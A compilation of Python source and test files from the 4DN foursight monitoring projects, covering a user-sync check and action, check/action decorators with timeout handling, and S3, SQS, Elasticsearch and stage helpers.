if updates:
updates['DCIC Active/Inactive'] = '1'
actions['patch_excel'][a_record['OH Account Email']] = updates
else:
# If the user has an account in the data portal without 4DN credentials, but it is on OH
# add the credentials
users_all = [i for i in all_users if simple(i['email']) == oh_mail]
if users_all:
# skip if it is already pending for the credentials
if users_all[0].get('pending_lab'):
continue
credentials_only = True
user_data = create_user_from_oh_info(a_record, all_labs, all_grants, credentials_only=credentials_only)
if not user_data.get('lab'):
if a_record['OH Grant']:
add_awards = [i['uuid'] for i in all_grants if a_record['OH Grant'] in i['@id']]
else:
add_awards = []
if add_awards:
add_award = add_awards[0]
else:
add_award = a_record['OH Grant']
if a_record['OH Lab'] not in problem['cannot find the lab']:
problem['cannot find the lab'][a_record['OH Lab']] = {'award': '', 'users': []}
problem['cannot find the lab'][a_record['OH Lab']]['award'] = add_award
problem['cannot find the lab'][a_record['OH Lab']]['users'].append(a_record['OH UUID'])
continue
if user_data.get('lab_score') < 80:
if credentials_only:
user_data['uuid'] = users_all[0]['uuid']
problem['double check lab'].append(user_data)
continue
if credentials_only:
user_data['uuid'] = users_all[0]['uuid']
if users_all[0]['status'] == 'deleted':
user_data['status'] = 'current'
actions['add_credentials'].append(user_data)
continue
# if user is not in the data portal create new account
actions['add_user'].append(user_data)
all_patching_uuids = [v['DCIC UUID'] for v in actions['patch_excel'].values() if v.get('DCIC UUID')]
all_edge_cases_uuids = [i[0] for i in problem['edge cases']]
# skip the total
skip_list = all_dcic_uuids + all_patching_uuids + skip_users_uuid + all_edge_cases_uuids
remaining_users = [i for i in fdn_users if i['uuid'] not in skip_list]
if remaining_users:
for a_user in remaining_users:
# create empty record object
new_record, alt_awards = generate_record(a_user, all_labs, all_grants)
if new_record.get('DCIC Grant', '') == 'Lab missing 4DN Award':
print(a_user['uuid'])
problem['edge cases'].append([new_record['DCIC UUID'], 'Lab missing 4DN Award'])
continue
new_record['DCIC Active/Inactive'] = '1'
actions['add_excel'].append(new_record)
# some audit check
# check for delete users
code_delete_users = list(actions['inactivate_excel'].keys()) + actions['delete_user']
if len(excel_delete_users) < len(code_delete_users):
diff = [i for i in code_delete_users if i not in excel_delete_users]
for i in diff:
problem['audit checks'].append([i, 'info in data may not be in sync.'])
if i in actions['inactivate_excel'].keys():
del actions['inactivate_excel'][i]
if i in actions['delete_user']:
actions['delete_user'].remove(i)
# do we need action
check.summary = ""
for a_key in actions:
if actions[a_key]:
check.status = 'WARN'
check.allow_action = True
check.summary += '| {} {}'.format(str(len(actions[a_key])), a_key)
num_problems = 0
for k in problem.keys():
if problem[k]:
check.status = 'WARN'
if k != 'cannot find the lab':
num_problems += len(problem[k])
else:
for key in problem[k].keys():
num_problems += len(problem[k][key]['users'])
check.summary += '| %s problems' % (str(num_problems))
check.full_output = {'actions': actions, 'problems': problem}
return check
@action_function()
def sync_users_oh_start(connection, **kwargs):
action = ActionResult(connection, 'sync_users_oh_start')
my_auth = connection.ff_keys
sync_users_oh_check_result = action.get_associated_check_result(kwargs).get('full_output', {})
actions = sync_users_oh_check_result['actions']
user_list = get_oh_google_sheet()
action_logs = {'patch_success': [], 'patch_failure': [], 'post_success': [], 'post_failure': [], 'write_to_sheet_failure': ''}
# add new users to the data portal
if actions.get('add_user'):
for a_user in actions['add_user']:
del a_user['lab_score']
if 'OH_lab' in a_user:
del a_user['OH_lab']
if 'Log' in a_user:
del a_user['Log']
try:
ff_utils.post_metadata(a_user, 'user', my_auth)
except Exception as e:
action_logs['post_failure'].append({a_user['email']: str(e)})
else:
action_logs['post_success'].append(a_user['email'])
# Add permissions (lab and awards) to existing users in the data portal
if actions.get('add_credentials'):
for a_user in actions['add_credentials']:
user_uuid = a_user['uuid']
del a_user['uuid']
del a_user['lab_score']
if 'OH_lab' in a_user:
del a_user['OH_lab']
if 'Log' in a_user:
del a_user['Log']
try:
ff_utils.patch_metadata(a_user, user_uuid, my_auth)
except Exception as e:
action_logs['patch_failure'].append({user_uuid: str(e)})
else:
action_logs['patch_success'].append(a_user['email'])
# remove user's permissions from the data portal
if actions.get('delete_user'):
for a_user in actions['delete_user']:
# Delete the user permissions: submits_for, groups, viewing_groups and lab.
try:
ff_utils.delete_field(a_user, 'submits_for, lab, viewing_groups, groups', key=my_auth)
except Exception as e:
action_logs['patch_failure'].append({a_user: str(e)})
else:
action_logs['patch_success'].append(a_user)
# update google sheet
# we will create a modified version of the full stack and write on google sheet at once
worksheet = get_oh_google_sheet()
table = worksheet.get_all_values()
# Convert table data into an ordered dictionary
df = pd.DataFrame(table[1:], columns=table[0])
user_list = df.to_dict(orient='records', into=OrderedDict)
# generate records to write
gs_write = []
rows = user_list[0].keys()
# update dcic user info on excel
update_set = actions['update_excel']
for a_record in user_list:
dcic_uuid = a_record['DCIC UUID']
if dcic_uuid in update_set:
a_record.update(update_set[dcic_uuid])
# patch user info with dcic information for existing OH info
patch_set = actions['patch_excel']
for a_record in user_list:
oh_mail = a_record['OH Account Email']
if oh_mail in patch_set:
a_record.update(patch_set[oh_mail])
# inactivate user from dcic in excel
inactivate_set = actions['inactivate_excel']
for a_record in user_list:
dcic_uuid = a_record['DCIC UUID']
if dcic_uuid in inactivate_set:
a_record.update(inactivate_set[dcic_uuid])
# add new lines for new users
for new_line in actions['add_excel']:
temp = OrderedDict((key, "") for key in rows)
temp.update(new_line)
user_list.append(temp)
# Writting the data to the list gs_write
row = 1
for r, line in enumerate(user_list):
row = r + 1
# write columns
if row == 1:
for c, key in enumerate(line):
col = c + 1
gs_write.append(gspread.models.Cell(row, col, key))
row = r + 2
# write values
for c, key in enumerate(line):
col = c + 1
gs_write.append(gspread.models.Cell(row, col, line[key]))
# #Write the cells to the worksheet
try:
worksheet.update_cells(gs_write)
except Exception as e:
action_logs['write_to_sheet_failure'] = str(e)
# the return value from this operation will look like this
# {'spreadsheetId': '<KEY>',
# 'updatedCells': 10944,
# 'updatedColumns': 18,
# 'updatedRange': "'t est updates'!A1:R608",
# 'updatedRows': 608}
if action_logs['patch_failure'] or action_logs['post_failure'] or action_logs['write_to_sheet_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def replace_name_status(connection, **kwargs):
"""
Use replace function to replace `replace_name` and your check/action name to have a quick setup
Keyword arguments:
"""
check = CheckResult(connection, 'replace_name_status')
my_auth = connection.ff_keys
check.action = "replace_name_start"
check.description = "add description"
check.brief_output = []
check.summary = ""
check.full_output = {}
check.status = 'PASS'
check.allow_action = False
# check indexing queue
env = connection.ff_env
indexing_queue = ff_utils.stuff_in_queues(env, check_secondary=True)
# if you need to check for indexing queue
if indexing_queue:
check.status = 'PASS' # maybe use warn?
check.brief_output = ['Waiting for indexing queue to clear']
check.summary = 'Waiting for indexing queue to clear'
check.full_output = {}
return check
query_base = '/search/?type=NotMyType'
q = query_base
# print(q)
res = ff_utils.search_metadata(q, my_auth)
# check if anything in scope
if not res:
check.status = 'PASS'
check.summary = 'All Good!'
check.brief_output = ['All Good!']
check.full_output = {}
return check
for a_res in res:
# do something
pass
check.summary = ""
check.full_output = {}
check.status = 'WARN'
check.allow_action = True
return check
@action_function()
def replace_name_start(connection, **kwargs):
"""Start runs by sending compiled input_json to run_workflow endpoint"""
action = ActionResult(connection, 'replace_name_start')
my_auth = connection.ff_keys
my_env = connection.ff_env
replace_name_check_result = action.get_associated_check_result(kwargs).get('full_output', {})
# do something
for a_res in replace_name_check_result:
assert my_auth
assert my_env
break
return action
``` |
{
"source": "4dn-dcic/foursight-core",
"score": 2
} |
#### File: 4dn-dcic/foursight-core/app.py
```python
from chalice import Chalice
# Minimal app.py; used to verify foursight-core packaging scripts
app = Chalice(app_name='foursight_core')
@app.route('/')
def index():
return {'minimal': 'foursight_core'}
```
#### File: checks/helpers/sys_utils.py
```python
import re
from datetime import datetime, timedelta
from dateutil import tz
from dcicutils import (
es_utils,
)
from dcicutils.misc_utils import Retry
BUILD_INDICES_REGEX = re.compile('^[0-9]') # build indices are prefixed by numbers
def wipe_build_indices(es_url, check):
""" Wipes all number-prefixed indices on the given es_url. Be careful not to run while
builds are running as this will cause them to fail.
"""
check.status = 'PASS'
check.summary = check.description = 'Wiped all test indices on url: %s' % es_url
client = es_utils.create_es_client(es_url, True)
full_output = []
_, indices = cat_indices(client) # index name is index 2 in row
for index in indices:
try:
index_name = index[2]
except IndexError: # empty [] sometimes returned by API call
continue
if re.match(BUILD_INDICES_REGEX, index_name) is not None:
try:
resp = Retry.retrying(client.indices.delete, retries_allowed=3)(index=index_name)
except Exception as e:
full_output.append({'acknowledged': True, 'error': str(e)})
else:
full_output.append(resp)
if any(output['acknowledged'] is not True for output in full_output):
check.status = 'FAIL'
check.summary = check.description = 'Failed to wipe all test indices, see full output'
check.full_output = full_output
return check
def parse_datetime_to_utc(time_str, manual_format=None):
"""
Attempt to parse the string time_str with the given string format.
If no format is given, attempt to automatically parse the given string
that may or may not contain timezone information.
Returns a datetime object of the string in UTC
or None if the parsing was unsuccessful.
"""
if manual_format and isinstance(manual_format, str):
timeobj = datetime.strptime(time_str, manual_format)
else: # automatic parsing
if len(time_str) > 26 and time_str[26] in ['+', '-']:
try:
timeobj = datetime.strptime(time_str[:26],'%Y-%m-%dT%H:%M:%S.%f')
except ValueError:
return None
if time_str[26]=='+':
timeobj -= timedelta(hours=int(time_str[27:29]), minutes=int(time_str[30:]))
elif time_str[26]=='-':
timeobj += timedelta(hours=int(time_str[27:29]), minutes=int(time_str[30:]))
elif len(time_str) == 26 and '+' not in time_str[-6:] and '-' not in time_str[-6:]:
# nothing known about tz, just parse it without tz in this cause
try:
timeobj = datetime.strptime(time_str[0:26],'%Y-%m-%dT%H:%M:%S.%f')
except ValueError:
return None
else:
# last try: attempt without milliseconds
try:
timeobj = datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%S")
except ValueError:
return None
return timeobj.replace(tzinfo=tz.tzutc())
def cat_indices(client):
""" Wrapper function for the ES API _cat/indices so that the result returned is comprehensible.
:param client: es client to use
:returns: 2-tuple lists of header, rows
"""
if not client:
return [], []
indices = client.cat.indices(v=True).split('\n')
split_indices = [ind.split() for ind in indices]
headers = split_indices.pop(0) # first row is header
return headers, split_indices
```
#### File: foursight-core/foursight_core/decorators.py
```python
import traceback
import signal
import time
import sys
import os
from functools import wraps
from .check_schema import CheckSchema
from .run_result import (
CheckResult as CheckResultBase,
ActionResult as ActionResultBase
)
from .exceptions import BadCheckOrAction
from .sqs_utils import SQS
class Decorators(object):
CHECK_DECO = 'check_function'
ACTION_DECO = 'action_function'
POLL_INTERVAL = 10 # check child process every 10 seconds
CHECK_TIMEOUT = 870 # in seconds. set to less than lambda limit (900 s)
def __init__(self, foursight_prefix):
if os.environ.get('CHECK_TIMEOUT'):
self.set_timeout(os.environ.get('CHECK_TIMEOUT'))
self.prefix = foursight_prefix
self.sqs = SQS(self.prefix)
def CheckResult(self, *args, **kwargs):
check = CheckResultBase(*args, **kwargs)
check.set_prefix(self.prefix)
return check
def ActionResult(self, *args, **kwargs):
action = ActionResultBase(*args, **kwargs)
action.set_prefix(self.prefix)
return action
def set_timeout(self, timeout):
try:
timeout = int(timeout)
except ValueError:
print('ERROR! Timeout must be an integer. You gave: %s' % timeout)
else:
self.CHECK_TIMEOUT = timeout
def check_function(self, *default_args, **default_kwargs):
"""
Import decorator, used to decorate all checks.
Sets the check_decorator attribute so that methods can be fetched.
Any kwargs provided to the decorator will be passed to the function
if no kwargs are explicitly passed.
Handles all exceptions within running of the check, including validation
issues/some common errors when writing checks. Will also keep track of overall
runtime and cancel the check with status=ERROR if runtime exceeds CHECK_TIMEOUT.
If an exception is raised, will store the result in full_output and
return an ERROR CheckResult.
"""
def check_deco(func):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
kwargs = self.handle_kwargs(kwargs, default_kwargs)
parent_pid = os.getpid()
child_pid = os.fork()
if child_pid != 0: # we are the parent who will execute the check
try:
check = func(*args, **kwargs)
check.validate()
except Exception as e:
# connection should be the first (and only) positional arg
check = self.CheckResult(args[0], func.__name__)
check.status = 'ERROR'
check.description = 'Check failed to run. See full output.'
check.full_output = traceback.format_exc().split('\n')
kwargs['runtime_seconds'] = round(time.time() - start_time, 2)
check.kwargs = kwargs
os.kill(child_pid, signal.SIGKILL) # we finished, so kill child
return check.store_result()
else: # we are the child who handles the timeout
partials = {'name': func.__name__, 'kwargs': kwargs, 'is_check': True,
'start_time': start_time, 'connection': args[0]}
self.do_timeout(parent_pid, partials)
wrapper.check_decorator = self.CHECK_DECO
return wrapper
return check_deco
def action_function(self, *default_args, **default_kwargs):
"""
Import decorator, used to decorate all actions.
Required for action functions.
Any kwargs provided to the decorator will be passed to the function
if no kwargs are explicitly passed.
Handles all exceptions within running of the action, including validation
issues/some common errors when writing actions. Will also keep track of overall
runtime and cancel the check with status=ERROR if runtime exceeds CHECK_TIMEOUT.
If an exception is raised, will store the result in output and return an
ActionResult with status FAIL.
"""
def action_deco(func):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
kwargs = self.handle_kwargs(kwargs, default_kwargs)
parent_pid = os.getpid()
child_pid = os.fork()
if child_pid != 0: # we are the parent who will execute the check
try:
if 'check_name' not in kwargs or 'called_by' not in kwargs:
raise BadCheckOrAction('Action requires check_name and called_by in its kwargs.')
action = func(*args, **kwargs)
action.validate()
except Exception as e:
# connection should be the first (and only) positional arg
action = self.ActionResult(args[0], func.__name__)
action.status = 'FAIL'
action.description = 'Action failed to run. See output.'
action.output = traceback.format_exc().split('\n')
kwargs['runtime_seconds'] = round(time.time() - start_time, 2)
action.kwargs = kwargs
os.kill(child_pid, signal.SIGKILL) # we finished, so kill child
return action.store_result()
else: # we are the child who handles the timeout
partials = {'name': func.__name__, 'kwargs': kwargs, 'is_check': False,
'start_time': start_time, 'connection': args[0]}
self.do_timeout(parent_pid, partials)
wrapper.check_decorator = self.ACTION_DECO
return wrapper
return action_deco
def do_timeout(self, parent_pid, partials):
""" Wrapper for below method that handles:
1. Polling across the CHECK_TIMEOUT at POLL_INTERVAL
2. Exiting if we succeeded (the parent process died)
3. Killing the parent if it timed out
4. Invoking the timeout handler if it timed out
:arg parent_pid: parent pid to check on/kill if necessary
:arg partials: partial result to be passed to timeout handler if necessary
"""
for t in range(self.CHECK_TIMEOUT // self.POLL_INTERVAL): # Divide CHECK_TIMEOUT into POLL_INTERVAL slices
time.sleep(self.POLL_INTERVAL)
if not self.pid_is_alive(parent_pid):
sys.exit(0)
# We have timed out. Kill the parent and invoke the timeout handler.
# NOTE: Timeouts in Pytest will trigger undefined behavior since the parent is Pytest, not the thing
# executing the check. Execute Pytest with --forked option to override this.
os.kill(parent_pid, signal.SIGTERM)
self.timeout_handler(partials)
def timeout_handler(self, partials, signum=None, frame=None):
"""
Custom handler for signal that stores the current check
or action with the appropriate information and then exits using sys.exit
"""
if partials['is_check']:
result = self.CheckResult(partials['connection'], partials['name'])
result.status = 'ERROR'
else:
result = self.ActionResult(partials['connection'], partials['name'])
result.status = 'FAIL'
result.description = 'AWS lambda execution reached the time limit. Please see check/action code.'
kwargs = partials['kwargs']
kwargs['runtime_seconds'] = round(time.time() - partials['start_time'], 2)
result.kwargs = kwargs
result.store_result()
# need to delete the sqs message and propogate if this is using the queue
if kwargs.get('_run_info') and {'receipt', 'sqs_url'} <= set(kwargs['_run_info'].keys()):
runner_input = {'sqs_url': kwargs['_run_info']['sqs_url']}
self.sqs.delete_message_and_propogate(runner_input, kwargs['_run_info']['receipt'])
sys.exit('-RUN-> TIMEOUT for execution of %s. Elapsed time is %s seconds; keep under %s.'
% (partials['name'], kwargs['runtime_seconds'], self.CHECK_TIMEOUT))
@classmethod
def handle_kwargs(cls, kwargs, default_kwargs):
# add all default args that are not defined in kwargs
# also ensure 'uuid' and 'primary' are in there
for key in default_kwargs:
if key not in kwargs:
kwargs[key] = default_kwargs[key]
if 'uuid' not in kwargs:
kwargs['uuid'] = CheckSchema().create_uuid()
if 'primary' not in kwargs:
kwargs['primary'] = False
return kwargs
@classmethod
def pid_is_alive(cls, pid):
"""
Returns True if pid is still alive
"""
try:
os.kill(pid, 0) # do not send a signal, just error check
except OSError:
return False
else:
return True
```
#### File: foursight-core/foursight_core/environment.py
```python
import os
import json
from .s3_connection import S3Connection
class Environment(object):
def __init__(self, foursight_prefix):
self.prefix = foursight_prefix
self.s3_connection = S3Connection(self.get_env_bucket_name())
def get_env_bucket_name(self):
return self.prefix + '-envs'
def list_environment_names(self):
"""
Lists all environments in the foursight-envs s3. Returns a list of names
"""
return self.s3_connection.list_all_keys()
def list_valid_schedule_environment_names(self):
"""Lists all valid environ names used in schedules including 'all'"""
return self.list_environment_names() + ['all']
def is_valid_environment_name(self, env):
"""check if env is a valid environment name"""
if env in self.list_environment_names():
return True
else:
return False
def get_environment_info_from_s3(self, env_name):
return self.s3_connection.get_object(env_name)
def get_environment_and_bucket_info(self, env_name, stage):
env_res = self.get_environment_info_from_s3(env_name)
# check that the keys we need are in the object
if isinstance(env_res, dict) and {'fourfront', 'es'} <= set(env_res):
env_entry = {
'fourfront': env_res['fourfront'],
'es': env_res['es'],
'ff_env': env_res.get('ff_env', ''.join(['fourfront-', env_name])),
'bucket': ''.join([self.prefix + '-', stage, '-', env_name])
}
return env_entry
else:
raise Exception("malformatted environment info on s3 for key %s" % env_name)
def get_selected_environment_names(self, env_name):
if env_name == 'all':
return self.list_environment_names()
elif self.is_valid_environment_name(env_name):
return [env_name]
else:
raise Exception("not a valid env name")
def get_environment_and_bucket_info_in_batch(self, stage, env='all', envs=None):
"""
Generate environment information from the envs bucket in s3.
Returns a dictionary keyed by environment name with value of a sub-dict
with the fields needed to initiate a connection.
:param env: allows you to specify a single env to be initialized
:param envs: allows you to specify multiple envs to be initialized
"""
if envs is not None:
env_keys = envs
else:
try:
env_keys = self.get_selected_environment_names(env)
except:
return {} # provided env is not in s3
environments = {}
for env_key in env_keys:
environments[env_key] = self.get_environment_and_bucket_info(env_key, stage)
return environments
```
#### File: foursight-core/foursight_core/s3_connection.py
```python
from .abstract_connection import AbstractConnection
import json
import requests
import boto3
import datetime
class S3Connection(AbstractConnection):
def __init__(self, bucket_name):
self.client = boto3.client('s3')
self.resource = boto3.resource('s3')
self.cw = boto3.client('cloudwatch') # for s3 bucket stats
self.bucket = bucket_name
self.location = 'us-east-1'
# create the bucket if it doesn't exist
self.head_info = self.test_connection()
self.status_code = self.head_info.get('ResponseMetadata', {}).get("HTTPStatusCode", 404)
if self.status_code == 404:
self.create_bucket()
# get head_info again
self.head_info = self.test_connection()
self.status_code = self.head_info.get('ResponseMetadata', {}).get("HTTPStatusCode", 404)
def put_object(self, key, value):
try:
self.client.put_object(Bucket=self.bucket, Key=key, Body=value)
except:
return None
else:
return (key, value)
def get_object(self, key):
# return found bucket content or None on an error
try:
response = self.client.get_object(Bucket=self.bucket, Key=key)
body = response['Body'].read()
return json.loads(body)
except json.JSONDecodeError:
return body
except:
return None
def get_size(self):
"""
Gets the number of keys stored on this s3 connection. This is a very slow
operation since it has to enumerate all keys.
"""
bucket = self.resource.Bucket(self.bucket)
return sum(1 for _ in bucket.objects.all())
def get_size_bytes(self):
"""
Uses CloudWatch client to get the bucket size in bytes of this bucket.
Start and EndTime represent the window on which the bucket size will be
calculated. An average is taken across the entire window (Period=86400)
Useful for checks - may need further configuration
"""
now = datetime.datetime.utcnow()
resp = self.cw.get_metric_statistics(Namespace='AWS/S3',
MetricName='BucketSizeBytes',
Dimensions=[
{'Name': 'BucketName', 'Value': self.bucket},
{'Name': 'StorageType', 'Value': 'StandardStorage'}],
Statistics=['Average'],
Period=86400,
StartTime=(now-datetime.timedelta(days=1)).isoformat(),
EndTime=now.isoformat())
return resp['Datapoints']
def list_all_keys_w_prefix(self, prefix, records_only=False):
"""
List all s3 keys with the given prefix (should look like
'<prefix>/'). If records_only == True, then add '20' to the end of
the prefix to only find records that are in timestamp form (will
exclude 'latest' and 'primary'.)
s3 only returns up to 1000 results at once, hence the need for the
for loop. NextContinuationToken shows if there are more results to
return.
Returns the list of keys.
Also see list_all_keys()
"""
if not self.bucket:
return []
all_keys = []
# make sure prefix ends with a slash (bucket format)
prefix = ''.join([prefix, '/']) if not prefix.endswith('/') else prefix
# this will exclude 'primary' and 'latest' in records_only == True
# use '2' because is is the first digit of year (in uuid)
use_prefix = ''.join([prefix, '2' ])if records_only else prefix
bucket = self.resource.Bucket(self.bucket)
for obj in bucket.objects.filter(Prefix=use_prefix):
all_keys.append(obj.key)
# not sorted at this point
return all_keys
def list_all_keys(self):
if not self.bucket:
return []
all_keys = []
bucket = self.resource.Bucket(self.bucket)
for obj in bucket.objects.all():
all_keys.append(obj.key)
return all_keys
def delete_keys(self, key_list):
# boto3 requires this setup
to_delete = {'Objects' : [{'Key': key} for key in key_list]}
return self.client.delete_objects(Bucket=self.bucket, Delete=to_delete)
def test_connection(self):
try:
bucket_resp = self.client.head_bucket(Bucket=self.bucket)
except:
return {'ResponseMetadata': {'HTTPStatusCode': 404}}
return bucket_resp
def create_bucket(self, manual_bucket=None):
# us-east-1 is default location
# add CreateBucketConfiguration w/ Location key for a different region
# echoes bucket name if successful, None otherwise
bucket = manual_bucket if manual_bucket else self.bucket
try:
self.client.create_bucket(Bucket=bucket)
except:
return None
else:
return bucket
```
#### File: foursight-core/foursight_core/sqs_utils.py
```python
from datetime import datetime
import boto3
import json
from .stage import Stage
class SQS(object):
"""
class SQS is a collection of utils related to Foursight queues
"""
def __init__(self, foursight_prefix):
self.stage = Stage(foursight_prefix)
def invoke_check_runner(self, runner_input):
"""
Simple function to invoke the next check_runner lambda with runner_input
(dict containing {'sqs_url': <str>})
"""
client = boto3.client('lambda')
# InvocationType='Event' makes asynchronous
# try/except while async invokes are problematic
try:
response = client.invoke(
FunctionName=self.stage.get_runner_name(),
InvocationType='Event',
Payload=json.dumps(runner_input)
)
except:
response = client.invoke(
FunctionName=self.stage.get_runner_name(),
Payload=json.dumps(runner_input)
)
return response
def delete_message_and_propogate(self, runner_input, receipt, propogate=True):
"""
Delete the message with given receipt from sqs queue and invoke the next
lambda runner.
Args:
runner_input (dict): runner info, should minimally have 'sqs_url'
receipt (str): SQS message receipt
propogate (bool): if True (default), invoke another check runner lambda
Returns:
None
"""
sqs_url = runner_input.get('sqs_url')
if not sqs_url or not receipt:
return
client = boto3.client('sqs')
client.delete_message(
QueueUrl=sqs_url,
ReceiptHandle=receipt
)
if propogate is True:
self.invoke_check_runner(runner_input)
def recover_message_and_propogate(self, runner_input, receipt, propogate=True):
"""
Recover the message with given receipt to sqs queue and invoke the next
lambda runner.
Changing message VisibilityTimeout to 15 seconds means the message will be
available to the queue in that much time. This is a slight lag to allow
dependencies to process.
NOTE: VisibilityTimeout should be less than WaitTimeSeconds in run_check_runner
Args:
runner_input (dict): runner info, should minimally have 'sqs_url'
receipt (str): SQS message receipt
propogate (bool): if True (default), invoke another check runner lambda
Returns:
None
"""
sqs_url = runner_input.get('sqs_url')
if not sqs_url or not receipt:
return
client = boto3.client('sqs')
client.change_message_visibility(
QueueUrl=sqs_url,
ReceiptHandle=receipt,
VisibilityTimeout=15
)
if propogate is True:
self.invoke_check_runner(runner_input)
def get_sqs_queue(self):
"""
Returns boto3 sqs resource
"""
queue_name = self.stage.get_queue_name()
sqs = boto3.resource('sqs')
try:
queue = sqs.get_queue_by_name(QueueName=queue_name)
except:
queue = sqs.create_queue(
QueueName=queue_name,
Attributes={
'VisibilityTimeout': '900',
'MessageRetentionPeriod': '3600'
}
)
return queue
@classmethod
def send_sqs_messages(cls, queue, environ, check_vals, uuid=None):
"""
Send messages to SQS queue. Check_vals are entries within a check_group.
Optionally, provide a uuid that will be queued as the uuid for the run; if
not provided, datetime.utcnow is used
Args:
queue: boto3 sqs resource (from get_sqs_queue)
environ (str): foursight environment name
check_vals (list): list of formatted check vals, like those from
check_utils.CheckHandler().get_check_schedule
uuid (str): optional string uuid
Returns:
str: uuid of queued messages
"""
# uuid used as the MessageGroupId
if not uuid:
uuid = datetime.utcnow().isoformat()
# append environ and uuid as first elements to all check_vals
proc_vals = [[environ, uuid] + val for val in check_vals]
for val in proc_vals:
response = queue.send_message(MessageBody=json.dumps(val))
return uuid
@classmethod
def get_sqs_attributes(cls, sqs_url):
"""
Returns a dict of the desired attributes form the queue with given url
"""
backup = {
'ApproximateNumberOfMessages': 'ERROR',
'ApproximateNumberOfMessagesNotVisible': 'ERROR'
}
client = boto3.client('sqs')
try:
result = client.get_queue_attributes(
QueueUrl=sqs_url,
AttributeNames=[
'ApproximateNumberOfMessages',
'ApproximateNumberOfMessagesNotVisible'
]
)
except:
return backup
return result.get('Attributes', backup)
```
#### File: foursight-core/foursight_core/stage.py
```python
import os
class Stage(object):
prod_stage_name = 'prod'
def __init__(self, foursight_prefix):
self.prefix = foursight_prefix
@classmethod
def get_stage_from_env_variable(cls):
# set environmental variables in .chalice/config.json
return os.environ.get('chalice_stage', 'dev') # default to dev
@classmethod
def get_stage(cls):
stage = cls.get_stage_from_env_variable()
if stage == 'test':
stage = 'dev'
return stage
def get_queue_name(self):
return '-'.join([self.prefix, self.get_stage_from_env_variable(), 'check_queue'])
def get_runner_name(self):
check_runner = os.environ.get('CHECK_RUNNER', None)
if not check_runner:
check_runner = '-'.join([self.prefix, self.get_stage(), 'check_runner'])
return check_runner
@classmethod
def is_stage_prod(cls):
if cls.get_stage() == cls.prod_stage_name:
return True
else:
return False
```
#### File: foursight-core/tests/test_helpers.py
```python
from dateutil import tz
from foursight_core.checks.helpers import sys_utils
class TestHelpers():
timestr_1 = '2017-04-09T17:34:53.423589+00:00' # UTC
timestr_2 = '2017-04-09T17:34:53.423589+05:00' # 5 hours ahead of UTC
timestr_3 = '2017-04-09T17:34:53.423589-05:00' # 5 hours behind of UTC
timestr_4 = '2017-04-09T17:34:53.423589'
timestr_5 = '2017-04-09T17:34:53'
timestr_bad_1 = '2017-04-0589+00:00'
timestr_bad_2 = '2017-xxxxxT17:34:53.423589+00:00'
timestr_bad_3 = '2017-xxxxxT17:34:53.423589'
def test_parse_datetime_to_utc(self):
[dt_tz_a, dt_tz_b, dt_tz_c] = ['None'] * 3
for t_str in [self.timestr_1, self.timestr_2, self.timestr_3, self.timestr_4]:
dt = sys_utils.parse_datetime_to_utc(t_str)
assert (dt is not None)
assert (dt.tzinfo is not None and dt.tzinfo == tz.tzutc())
if t_str == self.timestr_1:
dt_tz_a = dt
elif t_str == self.timestr_2:
dt_tz_b = dt
elif t_str == self.timestr_3:
dt_tz_c = dt
assert (dt_tz_c > dt_tz_a > dt_tz_b)
for bad_tstr in [self.timestr_bad_1, self.timestr_bad_2, self.timestr_bad_3]:
dt_bad = sys_utils.parse_datetime_to_utc(bad_tstr)
assert (dt_bad is None)
# use a manual format
dt_5_man = sys_utils.parse_datetime_to_utc(self.timestr_5, manual_format="%Y-%m-%dT%H:%M:%S")
dt_5_auto = sys_utils.parse_datetime_to_utc(self.timestr_5)
assert (dt_5_auto == dt_5_man)
```
#### File: foursight-core/tests/test_version.py
```python
import os
from dcicutils.qa_utils import VersionChecker
def test_version_checker_use_dcicutils_changelog():
class MyVersionChecker(VersionChecker):
PYPROJECT = os.path.join(os.path.dirname(__file__), "../pyproject.toml")
CHANGELOG = os.path.join(os.path.dirname(__file__), "../CHANGELOG.rst")
MyVersionChecker.check_version()
``` |
{
"source": "4dn-dcic/foursight",
"score": 2
} |
#### File: foursight/tests/test_check_utils.py
```python
from conftest import *
class TestCheckUtils():
environ = DEV_ENV # hopefully this is up
app_utils_obj = app_utils.AppUtils()
connection = app_utils_obj.init_connection(environ)
check_handler = app_utils_obj.check_handler
def test_get_check_strings(self):
# do this for every check
all_check_strs = self.check_handler.get_check_strings()
for check_str in all_check_strs:
get_check = check_str.split('/')[1]
chalice_resp = self.app_utils_obj.run_get_check(self.environ, get_check)
body = chalice_resp.body
print("chalice_resp.body= " + str(body))
if body.get('status') == 'success':
assert (chalice_resp.status_code == 200)
if body.get('data') is None: # check not run yet
continue
assert (body.get('data', {}).get('name') == get_check)
assert (body.get('data', {}).get('status') in ['PASS', 'WARN', 'FAIL', 'ERROR', 'IGNORE'])
elif body.get('status') == 'error':
error_msg = "Not a valid check or action."
assert (body.get('description') == error_msg)
# test a specific check
one_check_str = self.check_handler.get_check_strings('indexing_progress')
assert (one_check_str == 'system_checks/indexing_progress')
assert (one_check_str in all_check_strs)
# test a specific check that doesn't exist
bad_check_str = self.check_handler.get_check_strings('not_a_real_check')
assert (bad_check_str is None)
def test_validate_check_setup(self):
assert (self.check_handler.validate_check_setup(self.check_handler.CHECK_SETUP) == self.check_handler.CHECK_SETUP)
# make sure modules were added
for check in self.check_handler.CHECK_SETUP.values():
assert ('module' in check)
# do a while bunch of validation failure cases
bad_setup = {'not_a_check': {}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('does not have a proper check function defined' in str(exc.value))
bad_setup = {'indexing_progress': []}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must be a dictionary' in str(exc.value))
bad_setup = {'indexing_progress': {'title': {}, 'group': {}, 'blah': {}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have the required keys' in str(exc.value))
bad_setup = {'indexing_progress': {'title': {}, 'group': {}, 'schedule': []}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a string value for field' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': []}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value for field' in str(exc.value))
